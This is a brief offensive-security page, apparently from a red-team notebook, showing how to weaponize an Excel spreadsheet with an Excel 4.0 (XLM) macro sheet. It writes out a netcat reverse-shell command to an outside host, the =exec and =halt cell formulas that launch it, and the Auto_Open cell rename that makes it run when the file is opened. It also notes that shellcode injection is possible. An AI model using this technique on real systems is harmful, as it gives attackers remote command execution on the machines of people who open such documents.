⭕XLM Macro 4.0

A Microsoft Excel Spreadsheet can be weaponized by firstly inserting a new sheet of type "MS Execel 4.0 Macro":

shell.cmd :

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

We can then execute command by typing into the cells:

=exec("c:\shell.cmd")
=halt()

Note how we need to rename the A1 cell to Auto_Open if we want the Macros to fire off once the document is opened:

Opening the document and enabling Macros pops a reverse shell:

Note that XLM Macros allows using Win32 APIs, hence shellcode injection is also possible. See the original research link below for more info.

Last updated 2 years ago